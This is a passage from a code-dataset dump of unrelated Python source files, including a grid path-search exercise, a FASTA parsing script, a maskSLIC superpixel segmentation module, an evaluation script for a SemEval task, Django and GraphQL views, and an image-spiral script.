', ' ', ' ', 'v'],\n# [' ', ' ', ' ', ' ', ' ', '*']]\n#\n# Where '>', '<', '^', and 'v' refer to right, left, \n# up, and down motions. Note that the 'v' should be \n# lowercase. '*' should mark the goal cell.\n#\n# You may assume that all test cases for this function\n# will have a path from init to goal.\n# ----------\n\ngrid = [[0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0],\n [0, 0, 1, 0, 1, 0],\n [0, 0, 1, 0, 1, 0]]\ninit = [0, 0]\ngoal = [len(grid)-1, len(grid[0])-1]\ncost = 1\n\ndelta = [[-1, 0 ], # go up\n [ 0, -1], # go left\n [ 1, 0 ], # go down\n [ 0, 1 ]] # go right\n\ndelta_name = ['^', '<', 'v', '>']\n\ndef search(grid,init,goal,cost):\n # ----------------------------------------\n # insert code here\n # ----------------------------------------\n #path = [cost , init[0] , init[1]]\n expand = [[-1 for row in range(len(grid[0]))] for col in range(len(grid))]\n expand[0][0] = 0\n counter = 0\n graph = [[' ' for row in range(len(grid[0]))] for col in range(len(grid))] \n a = len(expand)-1\n b = len(expand[0]) -1 \n graph[a][b] = '*'\n opened = [[0,0,0]]\n visited = []\n while True : \n if len(opened) == 0 : \n return 'fail'\n temp = opened[:]\n for j in range(len(opened)) : \n try : \n cost = opened[j][0]\n init = [opened[j][1] , opened[j][2]]\n except : \n continue\n for i in range(len(delta)) : \n if init[0]+delta[i][0] < 0 or init[0]+delta[i][0] > len(grid) : \n continue \n elif init[1]+delta[i][1] < 0 or init[1]+delta[i][1] > len(grid[0]):\n continue \n try : \n if grid[ init[0]+delta[i][0]][ init[1]+delta[i][1]] == 1 : \n continue\n except : \n continue\n if [init[0]+delta[i][0] , init[1]+delta[i][1] ] in visited : \n continue\n visited.append(init)\n if[cost+1 , init[0]+delta[i][0] , init[1]+delta[i][1]] in opened : \n continue\n if [init[0]+delta[i][0] , init[1]+delta[i][1] ] == goal : \n counter += 1 \n expand[init[0]+delta[i][0]][ init[1]+delta[i][1]] = counter\n goal = expand[a][b]\n while True : \n for k in range(len(delta)) : \n if a+delta[k][0] < 0 or a+delta[k][0] > len(expand) :\n continue \n elif b+delta[k][1] < 0 or b+delta[k][1] > len(expand[0]) : \n continue \n try : \n if expand[ a+delta[k][0]][ b+delta[k][1]] == -1 : \n continue\n except : \n continue\n if ( expand[a+delta[k][0]][b+delta[k][1]] < goal ) : \n goal = expand[a+delta[k][0]][b+delta[k][1]] \n tempa = a+delta[k][0]\n tempb = b+delta[k][1]\n tempi = k\n a = tempa\n b = tempb\n graph[a][b] = delta_name[(tempi+2)%4]\n if tempa == 0 and tempb == 0 :\n break\n return graph\n opened.append([cost+1 , init[0]+delta[i][0] , init[1]+delta[i][1]] )\n counter += 1 \n expand[init[0]+delta[i][0]][ init[1]+delta[i][1]] = counter\n \n for i in temp : \n opened.remove(i)\n \nx = search(grid,init,goal,cost)\nfor i in grid :\n print(i)\nfor i in x: \n print(i )\n","sub_path":"4-serach.py","file_name":"4-serach.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"611073199","text":"import sys\r\nimport collections\r\n\r\nimport Data_Class\r\n\r\n# Error message printer and function exit handler \r\ndef crashAndBurn(message):\r\n print(\"Python Script ERROR: \")\r\n print(message)\r\n input(\"Press any key to continue...\")\r\n exit()\r\n\r\n# finds the index of the nth occurrence of sym after the start index in the given string\r\ndef find_nth_char(index, str, sym, n):\r\n if n < 1:\r\n crashAndBurn(\"Input of find_nth_char must be a positive integer.\")\r\n if len(str) < index < 0:\r\n crashAndBurn(\"Index \" + index + \" is invalid for string of length \" + len(str) + \":\\n\\t\" + str)\r\n\r\n while index < len(str):\r\n if str[index] == sym:\r\n if n == 1:\r\n return index\r\n else:\r\n n -= 1\r\n index += 1\r\n \r\n crashAndBurn(\"The \" + n + \"th index of \" + sym + \" was not found in \" + str)\r\n\r\n\r\n\"\"\"\r\nFile Reader opens the fasta and list file, reads each line from them, and returns a \r\ntuple with the read data\r\n\"\"\"\r\nclass File_Reader():\r\n # opens and read the files \r\n def read_files(self, fasta_file_name, list_file_name):\r\n print(\"\\tParsing [\" + fasta_file_name + \"] using [\" + list_file_name + \"].\")\r\n \r\n # open both files for reading:\r\n fasta_file = None\r\n list_file = None\r\n\r\n try:\r\n fasta_file = open(fasta_file_name, \"r\") \r\n list_file = open(list_file_name, \"r\")\r\n\r\n fasta_content = fasta_file.readlines()\r\n list_content = list_file.readlines()\r\n\r\n content_tuple = (fasta_content, list_content)\r\n \r\n finally:\r\n if fasta_file is None:\r\n crashAndBurn(\"Could not open \" + fasta_file_name + \" for reading.\")\r\n if list_file is None:\r\n crashAndBurn(\"Could not open \" + list_file_name + \" for reading.\") \r\n\r\n #close both files, return tuple\r\n fasta_file.close\r\n list_file.close\r\n return content_tuple\r\n\r\n\r\n # checks input arg count and calls read_files\r\n # returns the tuple of read data\r\n def read(self, fasta_file, list_file):\r\n if len(sys.argv) != 4:\r\n crashAndBurn(\"concatQualQuery Usage:\\n\\tconcatQualQuery.py \")\r\n \r\n file_info_tuple = File_Reader.read_files(self, fasta_file, list_file)\r\n return file_info_tuple\r\n\r\n\r\n\"\"\"\r\nFile Parser uses the fasta and list file data and creates a dictionary of the\r\nread names\r\n\"\"\"\r\nclass File_Parser():\r\n def __init__(self):\r\n self.fasta_index = 0\r\n self.list_index = 0\r\n\r\n ############################ FASTA PARSING METHODS ########################\r\n # parses the name of the read from the curr index of the fasta lines\r\n def parse_fasta_read_name(self, fasta_line):\r\n start = fasta_line.find(')') + 2\r\n end = find_nth_char(start, fasta_line, ' ', 1)\r\n return fasta_line[start:end]\r\n\r\n # parses the scaffold of the current read header\r\n def parse_scaffold(self, fasta_line):\r\n start = fasta_line.find(' ') + 1\r\n end = fasta_line.find('[') - 3\r\n return fasta_line[start:end]\r\n\r\n # parses the index of the current scaffold in the fasta file\r\n def parse_scaffold_index(self, fasta_line):\r\n start = find_nth_char(0,fasta_line, '(', 2)\r\n end = find_nth_char(start, fasta_line, ')', 1) + 1\r\n return fasta_line[start:end]\r\n \r\n # parses the start index of the scaffold in the current read from its header\r\n def parse_start_index(self, fasta_line):\r\n start = find_nth_char(0, fasta_line, '(', 2) + 2\r\n end = find_nth_char(start, fasta_line, '-', 1) - 1\r\n\r\n start_index_string = fasta_line[start:end]\r\n try:\r\n return int(start_index_string)\r\n except (ValueError, TypeError):\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[1] \r\n + \"\\n\\tHad trouble parsing the start index of the scaffold in its respective read\") \r\n\r\n # parses the end index of the scaffold in the current read from its header\r\n def parse_end_index(self, fasta_line):\r\n start = find_nth_char(0, fasta_line, '(', 2)\r\n start = find_nth_char(start, fasta_line, '-', 1) + 2\r\n end = find_nth_char(start, fasta_line, ')', 1) - 1\r\n\r\n end_index_string = fasta_line[start:end]\r\n try:\r\n return int(end_index_string)\r\n except (ValueError, TypeError):\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[1] \r\n + \"\\n\\tHad trouble parsing the end index of the scaffold in its respective read\")\r\n\r\n # parses the quality of the read\r\n def parse_read_qual(self, fasta_line):\r\n start = find_nth_char(0, fasta_line, ')', 2) + 3\r\n end = find_nth_char(start, fasta_line, '.', 1)\r\n\r\n start_index_string = fasta_line[start:end]\r\n try:\r\n return int(start_index_string)\r\n except (ValueError, TypeError):\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[1] \r\n + \"\\n\\tHad trouble parsing the quality of the scaffold in its respective read\")\r\n\r\n\r\n ######################### LIST PARSING METHODS ############################\r\n #parses the name of the read\r\n def parse_line_read_name(self, list_line):\r\n if list_line[0] != '>':\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[2] \r\n + \" did not begin with a \\'>\\' symbol.\")\r\n\r\n space_index = list_line.find(' ')\r\n if (len(list_line) < space_index < 2):\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[1] \r\n + \" did not follow the format\\n\\t[>Sequence_name num_bases]\")\r\n\r\n name = list_line[1:space_index] \r\n return name\r\n\r\n # parses the number of bases in the given read\r\n def parse_num_bases(self, list_line):\r\n space_index = list_line.find(' ')\r\n if (len(list_line) < space_index < 2):\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[2] \r\n + \" did not follow the format\\n\\t[>Sequence_name num_bases]\")\r\n\r\n bases_string = list_line[space_index:]\r\n try:\r\n return int(bases_string)\r\n except (ValueError, TypeError):\r\n crashAndBurn(\"Line \" + (self.list_index + 1) + \" of \" + sys.argv[2] \r\n + \" did not have an integer value as its final arg\")\r\n\r\n ######################### General Purpose #################################\r\n # fills in the member var data for each new read\r\n def fill_in_data(self, fasta_data, data, fasta_line):\r\n Data_Class.Read_Data.update_read(data,\r\n fasta_data[self.fasta_index + 1],\r\n File_Parser.parse_start_index(self, fasta_line), \r\n File_Parser.parse_end_index(self, fasta_line),\r\n File_Parser.parse_read_qual(self, fasta_line),\r\n self.fasta_index + 1,\r\n sys.argv[1])\r\n \r\n Data_Class.Read_Data.add_scaffold(data, \r\n File_Parser.parse_scaffold(self, fasta_line),\r\n File_Parser.parse_scaffold_index(self, fasta_line))\r\n \r\n # controls the parsing algorithm for each read\r\n def parse(self, info_tuple):\r\n Reads = collections.defaultdict(Data_Class.Read_Data)\r\n discovered_name = File_Parser.parse_fasta_read_name(self, \r\n info_tuple[0][self.fasta_index])\r\n\r\n # iterates through the list file, updates all dictionary indices\r\n while self.list_index < (len(info_tuple[1])):\r\n expected_name = File_Parser.parse_line_read_name(self, info_tuple[1][self.list_index])\r\n bases = File_Parser.parse_num_bases(self, info_tuple[1][self.list_index])\r\n \r\n # set empty data\r\n data = Data_Class.Read_Data(read=[Data_Class.UNKNOWN_BASE] * bases, \r\n scaffolds=[], \r\n scaffold_locations=[],\r\n qualities=[0] * bases, \r\n num_matches=0, \r\n max_index=bases) \r\n \r\n # continue to add scaffolds while the header matches the read name\r\n while (discovered_name == expected_name):\r\n File_Parser.fill_in_data(self, \r\n info_tuple[0], \r\n data, \r\n info_tuple[0][self.fasta_index])\r\n\r\n self.fasta_index += 2 \r\n if self.fasta_index > len(info_tuple[0]) - 1:\r\n break\r\n discovered_name = File_Parser.parse_fasta_read_name(self, \r\n info_tuple[0][self.fasta_index]) \r\n\r\n #print(expected_name)\r\n #Data_Class.Read_Data.print_data(data)\r\n\r\n # add Read_Data var to dictionary \r\n Reads[expected_name] = data \r\n self.list_index += 1\r\n \r\n return Reads\r\n \r\n\r\n'''\r\nWrites the read data to the respective output file\r\n'''\r\nclass File_Writer():\r\n def __init__(self):\r\n self.output = None\r\n\r\n def write(self, read_dict, output_file):\r\n try:\r\n self.output = open(output_file, \"w\")\r\n except IOError:\r\n if self.output is None:\r\n crashAndBurn(\"Could not open \" + self.output + \" for reading.\") \r\n\r\n index = 0 \r\n for read in read_dict:\r\n # write read name\r\n curr = read_dict[read]\r\n self.output.write(\">\" + read)\r\n \r\n # write scaffolds\r\n while index < len(curr.scaffolds):\r\n self.output.write(\" \" + curr.scaffolds[index])\r\n self.output.write(\" \" + curr.scaffold_loc[index])\r\n index += 1\r\n index = 0\r\n\r\n # write match data\r\n if curr.num_matches == 0:\r\n self.output.write(\" read length \" + str(curr.max_index) + \" NOT FOUND\\n\")\r\n else:\r\n self.output.write(\" \" + str(curr.num_matches) + \" of \") \r\n self.output.write(str(curr.max_index) + \" genes match: \") \r\n percent = float(curr.num_matches) / float(curr.max_index) * 100.0\r\n self.output.write(str(percent) + \"%\\n\")\r\n\r\n # write the read itself\r\n for base in curr.read:\r\n self.output.write(base)\r\n\r\n self.output.write(\"\\n\")\r\n self.output.close\r\n\r\n\r\n'''\r\nmain method of Concat Qual Query\r\n'''\r\nif __name__ == '__main__':\r\n if len(sys.argv) != 4:\r\n crashAndBurn(\"concatQualQuery Usage:\\n\\tconcatQualQuery.py \")\r\n\r\n # copy data from files to memory \r\n info_tuple = File_Reader().read(sys.argv[1], sys.argv[2])\r\n \r\n # create a dictionary of that data\r\n try:\r\n read_dict = File_Parser().parse(info_tuple)\r\n except:\r\n crashAndBurn(\"There was an issue parsing [\" + sys.argv[1] + \"]\")\r\n \r\n # write the updated data to the output file\r\n File_Writer().write(read_dict, sys.argv[3])\r\n\r\n exit()","sub_path":"CMakeSLAM/CMakeSLAM/PythonScripts/concatQualQuery.py","file_name":"concatQualQuery.py","file_ext":"py","file_size_in_byte":11695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"169369405","text":"\"\"\"\nmaskSLIC: Modified from scikit-image slic method\n\nOriginal code (C) scikit-image\nModification (C) 2016-2019 Benjamin Irving\n\nSee LICENSE.txt for more details\n\"\"\"\n\n# coding=utf-8\nfrom __future__ import division, absolute_import, unicode_literals, print_function\n\nimport warnings\nimport collections as coll\n\nimport numpy as np\n\nfrom scipy import ndimage as ndi\nfrom scipy.ndimage.morphology import distance_transform_edt\nfrom scipy.ndimage.filters import gaussian_filter\n\nfrom skimage.util import img_as_float, regular_grid\nfrom skimage.color import rgb2lab\n\nfrom ._slic import _slic_cython, _enforce_label_connectivity_cython\nfrom .processing import get_mpd\n\ndef place_seed_points(image, mask, n_segments, spacing):\n \"\"\"\n Method for placing seed points in an ROI\n\n Note:\n Optimal point placement problem is somewhat related to the k-center problem\n metric facility location (MFL)\n Maxmin facility location\n https://en.wikipedia.org/wiki/Facility_location_problem\n\n :param image:\n :param mask:\n :param n_segments:\n :param spacing:\n\n :return:\n \"\"\"\n segments_z = np.zeros(n_segments, dtype=np.int64)\n segments_y = np.zeros(n_segments, dtype=np.int64)\n segments_x = np.zeros(n_segments, dtype=np.int64)\n\n m_inv = np.copy(mask)\n\n # Cropping to bounding box around ROI\n nonzero_x, nonzero_y, nonzero_z = np.nonzero(m_inv)\n bbox_start = [np.min(nonzero_x), np.min(nonzero_y), np.min(nonzero_z)]\n bbox_end = [np.max(nonzero_x), np.max(nonzero_y), np.max(nonzero_z)]\n m_inv = m_inv[bbox_start[0]:bbox_end[0]+1, bbox_start[1]:bbox_end[1]+1, bbox_start[2]:bbox_end[2]+1]\n\n # SEED STEP 1: n seeds are placed as far as possible from every other seed and the edge.\n for seg_idx in range(n_segments):\n\n # Distance transform\n dtrans = distance_transform_edt(m_inv, sampling=spacing)\n dtrans = gaussian_filter(dtrans, sigma=0.1)\n\n # Use the maximum locations for the first two points\n coords1 = np.nonzero(dtrans == np.max(dtrans))\n segments_z[seg_idx] = coords1[0][0]\n segments_x[seg_idx] = coords1[1][0]\n segments_y[seg_idx] = coords1[2][0]\n\n # Adding a new point\n m_inv[segments_z[seg_idx], segments_x[seg_idx], segments_y[seg_idx]] = False\n\n segments_z = segments_z + bbox_start[0]\n segments_x = segments_x + bbox_start[1]\n segments_y = segments_y + bbox_start[2]\n\n segments_color = np.zeros((segments_z.shape[0], image.shape[3]))\n segments = np.concatenate([segments_z[..., np.newaxis],\n segments_x[..., np.newaxis],\n segments_y[..., np.newaxis],\n segments_color], axis=1)\n\n segments_z = np.ascontiguousarray(segments_z, dtype=np.int32)\n segments_x = np.ascontiguousarray(segments_x, dtype=np.int32)\n segments_y = np.ascontiguousarray(segments_y, dtype=np.int32)\n\n out1 = get_mpd(segments_z, segments_x, segments_y)\n step_z, step_x, step_y = out1[0], out1[1], out1[2]\n\n return segments, step_x, step_y, step_z\n\ndef slic(image, n_segments=100, compactness=10., max_iter=10, sigma=0,\n seed_type='grid', spacing=None, multichannel=True, convert2lab=None,\n enforce_connectivity=False, min_size_factor=0.5, max_size_factor=3,\n slic_zero=False, multifeat=False, return_adjacency=False, mask=None,\n return_segments=False, recompute_seeds=False):\n \"\"\"\n Segments image using k-means clustering in Color-(x,y,z) space.\n\n :param image: 2D, 3D or 4D ndarray\n Input image, which can be 2D or 3D, and grayscale or multichannel\n (see `multichannel` parameter).\n :param n_segments: int, optional\n The (approximate) number of labels in the segmented output image.\n :param compactness: float, optional\n Balances color proximity and space proximity. Higher values give\n more weight to space proximity, making superpixel shapes more\n square/cubic. In SLICO mode, this is the initial compactness.\n This parameter depends strongly on image contrast and on the\n shapes of objects in the image. We recommend exploring possible\n values on a log scale, e.g., 0.01, 0.1, 1, 10, 100, before\n refining around a chosen value.\n :param max_iter: int, optional\n Maximum number of iterations of k-means.\n :param sigma: float or (3,) array-like of floats, optional\n Width of Gaussian smoothing kernel for pre-processing for each\n dimension of the image. The same sigma is applied to each dimension in\n case of a scalar value. Zero means no smoothing.\n Note, that `sigma` is automatically scaled if it is scalar and a\n manual voxel spacing is provided (see Notes section).\n :param spacing: (3,) array-like of floats, optional\n The voxel spacing along each image dimension. By default, `slic`\n assumes uniform spacing (same voxel resolution along z, y and x).\n This parameter controls the weights of the distances along z, y,\n and x during k-means clustering.\n :param multichannel: bool, optional\n Whether the last axis of the image is to be interpreted as multiple\n channels or another spatial dimension.\n :param convert2lab: bool, optional\n Whether the input should be converted to Lab colorspace prior to\n maskslic. The input image *must* be RGB. Highly recommended.\n This option defaults to ``True`` when ``multichannel=True`` *and*\n ``image.shape[-1] == 3``.\n :param enforce_connectivity: bool, optional\n Whether the generated segments are connected or not\n :param min_size_factor: float, optional\n Proportion of the minimum segment size to be removed with respect\n to the supposed segment size ```depth*width*height/n_segments```\n :param max_size_factor: float, optional\n Proportion of the maximum connected segment size. A value of 3 works\n in most of the cases.\n :param slic_zero: bool, optional\n Run SLIC-zero, the zero-parameter mode of SLIC. [2]_\n :param mask: ndarray of bools or 0s and 1s, optional\n Array of same shape as `image`. Supervoxel analysis will only be performed on points at\n which mask == True\n\n :return: labels : 2D or 3D array\n Integer mask indicating segment labels.\n\n Raises\n ------\n ValueError\n If ``convert2lab`` is set to ``True`` but the last array\n dimension is not of length 3.\n\n Notes\n -----\n * If `sigma > 0`, the image is smoothed using a Gaussian kernel prior to\n maskslic.\n\n * If `sigma` is scalar and `spacing` is provided, the kernel width is\n divided along each dimension by the spacing. For example, if ``sigma=1``\n and ``spacing=[5, 1, 1]``, the effective `sigma` is ``[0.2, 1, 1]``. This\n ensures sensible smoothing for anisotropic images.\n\n * The image is rescaled to be in [0, 1] prior to processing.\n\n * Images of shape (M, N, 3) are interpreted as 2D RGB images by default. To\n interpret them as 3D with the last dimension having length 3, use\n `multichannel=False`.\n\n References\n ----------\n .. [1] Radhakrishna Achanta, Appu Shaji, Kevin Smith, Aurelien Lucchi,\n Pascal Fua, and Sabine Susstrunk, SLIC Superpixels Compared to\n State-of-the-art Superpixel Methods, TPAMI, May 2012.\n .. [2] http://ivrg.epfl.ch/research/superpixels#SLICO\n\n Examples\n --------\n >>> from maskslic import slic\n >>> from skimage.data import astronaut\n >>> img = astronaut()\n >>> segments = slic(img, n_segments=100, compactness=10)\n\n Increasing the compactness parameter yields more square regions:\n\n >>> segments = slic(img, n_segments=100, compactness=20)\n\n \"\"\"\n if slic_zero:\n raise NotImplementedError(\"Slic zero has not been implemented yet for maskSLIC.\")\n\n if mask is None and seed_type == 'nplace':\n warnings.warn('nplace assignment of seed points should only be used with an ROI. Changing seed type.')\n seed_type = 'grid'\n\n if seed_type == 'nplace' and recompute_seeds is False:\n warnings.warn('Seeds should be recomputed when seed points are randomly assigned')\n\n image = img_as_float(image)\n is_2d = False\n if image.ndim == 2:\n # 2D grayscale image\n image = image[np.newaxis, ..., np.newaxis]\n is_2d = True\n elif image.ndim == 3 and multichannel:\n # Make 2D multichannel image 3D with depth = 1\n image = image[np.newaxis, ...]\n is_2d = True\n elif image.ndim == 3 and not multichannel:\n # Add channel as single last dimension\n image = image[..., np.newaxis]\n\n if spacing is None:\n spacing = np.ones(3)\n elif isinstance(spacing, (list, tuple)):\n spacing = np.array(spacing, dtype=np.double)\n\n if not isinstance(sigma, coll.Iterable):\n sigma = np.array([sigma, sigma, sigma], dtype=np.double)\n sigma /= spacing.astype(np.double)\n elif isinstance(sigma, (list, tuple)):\n sigma = np.array(sigma, dtype=np.double)\n if (sigma > 0).any():\n # add zero smoothing for multichannel dimension\n sigma = list(sigma) + [0]\n image = ndi.gaussian_filter(image, sigma)\n\n if multichannel and (convert2lab or convert2lab is None):\n if image.shape[-1] != 3 and convert2lab:\n raise ValueError(\"Lab colorspace conversion requires a RGB image.\")\n elif image.shape[-1] == 3:\n image = rgb2lab(image)\n\n if multifeat:\n feat_scale = float(image.shape[3])\n else:\n feat_scale = 1.0\n\n depth, height, width = image.shape[:3]\n\n if mask is None:\n mask = np.ones(image.shape[:3], dtype=np.bool)\n else:\n mask = np.asarray(mask, dtype=np.bool)\n\n if mask.ndim == 2:\n mask = mask[np.newaxis, ...]\n\n if seed_type == 'nplace':\n\n segments, step_x, step_y, step_z = place_seed_points(image, mask, n_segments, spacing)\n\n elif seed_type == 'grid':\n\n # initialize cluster centroids for desired number of segments\n # essentially just outputs the indices of a grid in the x, y and z direction\n grid_z, grid_y, grid_x = np.mgrid[:depth, :height, :width]\n # returns 3 slices (an object representing an array of slices, see builtin slice)\n slices = regular_grid(image.shape[:3], n_segments)\n step_z, step_y, step_x = [int(s.step) for s in slices] # extract step size from slices\n segments_z = grid_z[slices] # use slices to extract coordinates for centre points\n segments_y = grid_y[slices]\n segments_x = grid_x[slices]\n\n # list of all locations as well as zeros for the color features\n segments_color = np.zeros(segments_z.shape + (image.shape[3],))\n segments = np.concatenate([segments_z[..., np.newaxis],\n segments_y[..., np.newaxis],\n segments_x[..., np.newaxis],\n segments_color],\n axis=-1).reshape(-1, 3 + image.shape[3])\n\n if mask is not None:\n ind1 = mask[segments[:, 0].astype('int'), segments[:, 1].astype('int'), segments[:, 2].astype('int')]\n segments = segments[ind1, :]\n else:\n raise ValueError('seed_type should be nplace or grid')\n\n segments = np.ascontiguousarray(segments)\n\n # We do the scaling of ratio in the same way as in the SLIC paper\n # so the values have the same meaning\n step = float(max((step_z, step_y, step_x)))\n ratio = 1.0 / compactness\n\n image = np.ascontiguousarray(image * ratio, dtype=np.double)\n mask = np.ascontiguousarray(mask, dtype=np.int32)\n\n #segments_old = np.copy(segments)\n\n if recompute_seeds:\n # Seed step 2: Run SLIC to reinitialise seeds\n # Runs the supervoxel method but only uses distance to better initialise the method\n labels = _slic_cython(image, mask, segments, step, max_iter, spacing, slic_zero, feat_scale, only_dist=True)\n\n labels = _slic_cython(image, mask, segments, step, max_iter, spacing, slic_zero, feat_scale, only_dist=False)\n\n if enforce_connectivity:\n segment_size = mask.sum() / n_segments\n\n min_size = int(min_size_factor * segment_size)\n max_size = int(max_size_factor * segment_size)\n\n labels = _enforce_label_connectivity_cython(labels, mask, n_segments, min_size, max_size)\n\n ret = []\n if is_2d:\n ret.append(labels[0])\n else:\n ret.append(labels)\n\n if return_adjacency:\n # Also return adjacency map\n labels = np.ascontiguousarray(labels, dtype=np.int32)\n if mask is None:\n adj_mat, border_mat = _find_adjacency_map(labels)\n else:\n adj_mat, border_mat = _find_adjacency_map_mask(labels)\n\n ret.append(adj_mat)\n ret.append(border_mat)\n\n if return_segments:\n ret.append(segments)\n\n if len(ret) == 1:\n return ret[0]\n else:\n return tuple(ret)\n","sub_path":"maskslic/slic_superpixels.py","file_name":"slic_superpixels.py","file_ext":"py","file_size_in_byte":13020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"10652462","text":"import random\n\nnum_itens = int(input('Digite o número de itens que deseja na lista: ')) \ncontador = 0\nlista = []\n\nwhile (contador<=num_itens):\n lista.append(random.randrange(0, 1000))\n contador+=1\nprint('A lista aleatória é: ',lista)\nprint('O maior valor é: ',max(lista))\nprint('O menor valor é: ',min(lista))","sub_path":"Ex5_Aula3.py","file_name":"Ex5_Aula3.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"64569498","text":"#Program which evaluates semeval 2019 task 6 output\n#Example run: python3 evaluate.py Kim-CNN_random_out english/agr_en_dev.csv\n\nimport sys\nimport csv\n\ndef evaluate(outputFile, goldFile):\n output = {}\n gold = {}\n total = 0.0\n correct = 0.0\n classCor = {}\n classAtt = {}\n classTot = {}\n \n #Read in/store output \n with open(outputFile, 'r') as csvfile:\n outputreader = csv.reader(csvfile, delimiter=',')\n for curOut in outputreader:\n output[curOut[0].strip()] = curOut[1].strip()\n if(curOut[1].strip() not in classCor):\n classCor[curOut[1].strip()] = 0.0\n classAtt[curOut[1].strip()] = 0.0\n classTot[curOut[1].strip()] = 0.0\n\n #Read in/store gold keys\n with open(goldFile, 'r') as csvfile:\n goldreader = csv.reader(csvfile, delimiter='\\t')\n for curGold in goldreader:\n gold[curGold[0].strip()] = curGold[3].strip()\n if(curGold[3].strip() not in classCor):\n classCor[curGold[3].strip()] = 0.0\n classAtt[curGold[3].strip()] = 0.0\n classTot[curGold[3].strip()] = 0.0\n\n\n #Compares each output to the corresponding gold standard, noting each correct\n for curOut in output:\n total += 1\n classTot[gold[curOut]] += 1\n classAtt[output[curOut]] += 1\n \n if(output[curOut] == gold[curOut]):\n correct += 1\n classCor[output[curOut]] += 1\n \n #calculate macro precision and recall, then macro f1 score\n macroPrList = []\n macroReList = [] \n macroF1List = []\n for c in classCor:\n curMacroRe = classCor[c]/classTot[c]\n curMacroPr = classCor[c]/classAtt[c]\n curMacroF1 = 2 * (curMacroPr * curMacroRe)/(curMacroPr + curMacroRe)\n macroPrList.append(curMacroPr)\n macroReList.append(curMacroRe)\n macroF1List.append(curMacroF1)\n\n macroPr = sum(macroPrList)/len(macroPrList)\n macroRe = sum(macroReList)/len(macroReList)\n macroF1 = sum(macroF1List)/len(macroF1List) \n\n print(\"Total correct for\", outputFile, \"-\\n Accuracy =\", correct/total, \"\\n Macro Precision =\", macroPr, \"\\n Macro Recall =\", macroRe, \"\\n Macro F1=\", macroF1 )\n\n\n\nevaluate(sys.argv[1], sys.argv[2])\n","sub_path":"evaluateB.py","file_name":"evaluateB.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"73666046","text":"from django.http import HttpResponse\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom rest_framework import viewsets\nfrom .models import Question, Choice, Character\nfrom .serializers import QuestionSerializer, ChoiceSerializer, CharacterSerializer\n\n\nclass QuestionViewSet(viewsets.ModelViewSet):\n queryset = Question.objects.all().order_by('id')\n serializer_class = QuestionSerializer\n\n\nclass ChoiceViewSet(viewsets.ModelViewSet):\n serializer_class = ChoiceSerializer\n queryset = Choice.objects.all()\n\n def get_queryset(self):\n queryset = Choice.objects.all()\n question = self.request.query_params.get('question', None)\n if question is not None:\n queryset = queryset.filter(question=question)\n return queryset\n\n queryset = Choice.objects.all().order_by('id')\n serializer_class = ChoiceSerializer\n","sub_path":"space_escape_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"340985493","text":"# -*- coding: utf-8 -*-\n__author__ = 'ffuentes'\n\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom graphene_django.views import GraphQLView\n\nfrom .core import *\nfrom .types import *\nfrom .query import *\nfrom .mutations import *\n\n_nimeta = getattr(NOCRootQuery, 'NIMeta')\ngraphql_types = getattr(_nimeta, 'graphql_types')\n\nNOCSCHEMA_TYPES = [\n # Interfaces\n NINode,\n\n # common\n User,\n Dropdown,\n Choice,\n Neo4jChoice,\n NodeHandler,\n] + graphql_types\n\nNOCSCHEMA_QUERIES = [\n NOCRootQuery,\n]\n\nNOCSCHEMA_MUTATIONS = [\n NOCRootMutation,\n]\n\n\ndef login_required_env(f):\n # skip authentication to inspect graphql schema\n if settings.INSPECT_SCHEMA:\n return f\n else:\n return login_required(f)\n\n\n@method_decorator(login_required_env, name='dispatch')\nclass AuthGraphQLView(GraphQLView):\n pass\n","sub_path":"src/niweb/apps/noclook/schema/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"434927169","text":"#!Python3\r\n#ImageArchimed - Выставляет исходное изображение по спирали архимеда\r\n\r\nimport os, numpy\r\nfrom PIL import Image\r\n\r\nF = round((1+numpy.sqrt(5))/2,3) #Пропорция золотого сечения\r\nIMAGE_FILENAME = \"Arh.jpg\" #Название открываемого изображения\r\nNUM_TURN = 8\r\n\r\n\r\nImage0 = Image.open(IMAGE_FILENAME) #Записываю картинку в переменную Image0\r\nWidht_Im, Height_Im = Image0.size #Запись размеров изображения\r\n\r\n#if Widht_Im <= Height_Im: #Если изображение повёрнуто не горизонтально, поворачивает его\r\n# Image0 = Image0.rotate(90)\r\nXsize = [0, Widht_Im, ]\r\nYsize = [0, Height_Im, ]\r\nCycle = 0\r\n\r\nfor i in range(1,NUM_TURN): #Получаю координаты касания спирали с прямоугольником\r\n Xsize.append(round(int(Xsize[i] / F)))\r\n Ysize.append(round(int(Ysize[i] / F)))\r\nprint(Xsize,\" \",Ysize)\r\nXcor = { #Задаю эмпирически полученные координаты точек X\r\n 0:0,\r\n 1:Xsize[1],\r\n 2:Xsize[1]-Xsize[2],\r\n 3:0,\r\n 4:Xsize[3],\r\n 5:Xsize[1]-Xsize[2],\r\n 6:Xsize[1]-Xsize[2]-Xsize[4],\r\n 7:Xsize[3]+Xsize[6]\r\n}\r\nYcor = { #Задаю эмпирически полученные координаты точек Y\r\n 0:0,\r\n 